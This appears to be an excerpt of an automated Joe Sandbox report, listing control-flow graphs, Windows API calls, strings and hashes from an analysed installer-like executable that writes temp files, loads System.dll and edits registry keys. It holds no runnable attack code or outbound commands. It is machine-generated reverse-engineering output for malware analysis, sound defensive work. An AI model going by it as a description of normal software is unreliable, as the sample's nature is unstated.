                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9
                                • API String ID: 1439708474-2366072709
                                • Opcode ID: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                • Opcode Fuzzy Hash: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A

                                Control-flow Graph

                                control_flow_graph 640 406179-406199 GetSystemDirectoryW 641 4061b3 640->641 642 40619b-40619d 640->642 644 4061b5 641->644 642->641 643 40619f-4061aa 642->643 643->644 645 4061ac-4061b1 643->645 646 4061ba-4061e7 wsprintfW LoadLibraryExW 644->646 645->646
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C

                                Control-flow Graph

                                control_flow_graph 647 406a31-406a3d 648 406a3e-406a70 GetTickCount GetTempFileNameW 647->648 649 406a72-406a74 648->649 650 406a7b 648->650 649->648 651 406a76-406a79 649->651 652 406a7d-406a80 650->652 651->652
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406A68
                                Strings
                                • a, xrefs: 00406A46
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                • n, xrefs: 00406A3F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-3027303449
                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 653 403148-403181 654 403190-4031a4 call 406923 653->654 655 403183-40318b call 403131 653->655 659 403354 654->659 660 4031aa-4031b0 654->660 655->654 661 403356 659->661 662 4032f6-4032f8 660->662 663 4031b6-4031dd GetTickCount call 407c4f 660->663 664 403357-403361 661->664 665 4032fa-4032fc 662->665 666 40333d-403352 call 40311b 662->666 669 4032ee-4032f0 663->669 674 4031e3-4031fa call 40311b 663->674 665->669 670 4032fe 665->670 666->659 666->669 669->664 673 403303-403313 call 40311b 670->673 673->659 679 403315-403325 call 4069e6 673->679 674->659 680 403200-40320e 674->680 686 403327-403335 679->686 687 403339-40333b 679->687 682 403218-403234 call 406e83 680->682 688 4032f2-4032f4 682->688 689 40323a-40325a GetTickCount 682->689 686->673 690 403337 686->690 687->661 688->661 691 4032a7-4032ad 689->691 692 40325c-403265 689->692 690->669 695 4032e6-4032e8 691->695 696 4032af-4032b1 691->696 693 403267-403269 692->693 694 40326b-4032a3 MulDiv wsprintfW call 405d15 692->694 693->691 693->694 694->691 695->669 695->674 698 4032b3-4032bc call 4069e6 696->698 699 4032cb-4032d3 696->699 703 4032c1-4032c3 698->703 702 4032d7-4032de 699->702 702->682 704 4032e4 702->704 703->687 705 4032c5-4032c9 703->705 704->669 705->702
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134
                                • Opcode ID: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                • Opcode Fuzzy Hash: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E

                                Control-flow Graph

                                control_flow_graph 706 40141e-401456 call 4062b3 708 40145b-40145d 706->708 709 401463-40146d 708->709 710 401527-401530 708->710 711 401493-4014a4 709->711 712 40146f-401491 RegEnumValueW 709->712 714 4014ce-4014d6 RegEnumKeyW 711->714 712->711 713 401503-401512 RegCloseKey 712->713 713->710 715 4014a6-4014a8 714->715 716 4014d8-4014eb RegCloseKey call 4068c1 714->716 715->713 717 4014aa-4014c1 call 40141e 715->717 722 401514-40151e 716->722 723 4014ed-401501 RegDeleteKeyW 716->723 717->716 724 4014c3-4014cd 717->724 722->710 723->710 724->714
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                • Opcode Fuzzy Hash: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A

                                Control-flow Graph

                                control_flow_graph 725 40225d-402268 726 40233e-402343 725->726 727 40226e-402289 call 40303e * 2 725->727 728 402345-40234a call 405d15 726->728 736 40228b-402296 GetModuleHandleW 727->736 737 40229c-4022aa LoadLibraryExW 727->737 735 402ea5-402eb7 728->735 739 4022b0-4022c2 call 406244 736->739 740 402298 736->740 737->739 741 402335-40233c 737->741 745 4022c4-4022ca 739->745 746 402306-40230c call 405d15 739->746 740->737 741->728 748 4022e6-402304 745->748 749 4022cc-4022e0 call 405d15 745->749 750 402311-402315 746->750 748->750 749->750 759 4022e2-4022e4 749->759 750->735 753 40231b-402323 call 403cb1 750->753 753->735 758 402329-402330 FreeLibrary 753->758 758->735 759->750
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 334405425-204022868
                                • Opcode ID: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction ID: a1346d69ca964d54404f15d64018e456dfdc0067b09238f3cf27b8b50b8900a8
                                • Opcode Fuzzy Hash: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction Fuzzy Hash: 6021F832648301A7C711AF619E49A3F76A4AFD8721F60013FF951B12D0DBBC98029A5F

                                 Control-flow Graph (graph rendering not preserved; block and edge listing follows)
                                 control_flow_graph 760 402656-4026a8 call 40303e * 2 call 403023 call 406280 769 402ea5-402eb7 760->769 770 4026ae-4026b9 760->770 772 4026d1-4026d6 770->772 773 4026bb-4026cf call 40303e lstrlenW 770->773 774 4026e7-4026ec 772->774 775 4026d8-4026e5 call 403002 772->775 779 402700-40271a RegSetValueExW 773->779 774->779 780 4026ee-4026fe call 403148 774->780 775->779 784 40271c-402723 RegCloseKey 779->784 780->779 784->769
                                APIs
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 00402710
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 0040271D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp
                                • API String ID: 2655323295-3260894623
                                • Opcode ID: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction ID: 31e5bc54edfcad7c1b31027c56fe611cf8d7432ac604a3e5fe606c4c5445a84e
                                • Opcode Fuzzy Hash: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction Fuzzy Hash: 0F210032604300ABD7119FA0CD45A2FBBE8EB88760F10083EF540F31C0C7B99905879A

                                 Control-flow Graph (graph rendering not preserved; block and edge listing follows)
                                 control_flow_graph 786 4068c1-4068d7 GetModuleHandleA 787 4068e3-4068eb GetProcAddress 786->787 788 4068d9-4068da call 406179 786->788 789 4068f1-4068f3 787->789 791 4068df-4068e1 788->791 791->787 791->789
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD

                                 Control-flow Graph (graph rendering not preserved; block and edge listing follows)
                                 control_flow_graph 792 406952-406985 call 4062b3 795 4069c4-4069c6 792->795 796 406987-4069b6 RegQueryValueExW RegCloseKey 792->796 797 4069c9-4069cb 795->797 796->795 798 4069b8-4069bc 796->798 798->797 799 4069be-4069c2 798->799 799->795 799->797
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,00424200,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                • RegCloseKey.KERNELBASE(?), ref: 004069A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Call
                                • API String ID: 3356406503-1824292864
                                • Opcode ID: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction ID: 602e610a5625c9c57cce2cfaa1a97c2955b97914b1987e410d3f2042aedcb8ce
                                • Opcode Fuzzy Hash: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction Fuzzy Hash: 65015EB652010ABADF218FA4DD06EEF7BE8EF44754F11013AF801E22A0D374DA64DB94
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00405E01
                                • GetLastError.KERNEL32 ref: 00405E0B
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1375471231-3355392842
                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                APIs
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A44
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A4A
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A50
                                • GlobalFree.KERNEL32(00000000), ref: 6FC31738
                                • FreeLibrary.KERNEL32(?), ref: 6FC317C3
                                • GlobalFree.KERNEL32(00000000), ref: 6FC317E9
                                  • Part of subcall function 6FC31FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC31FFA
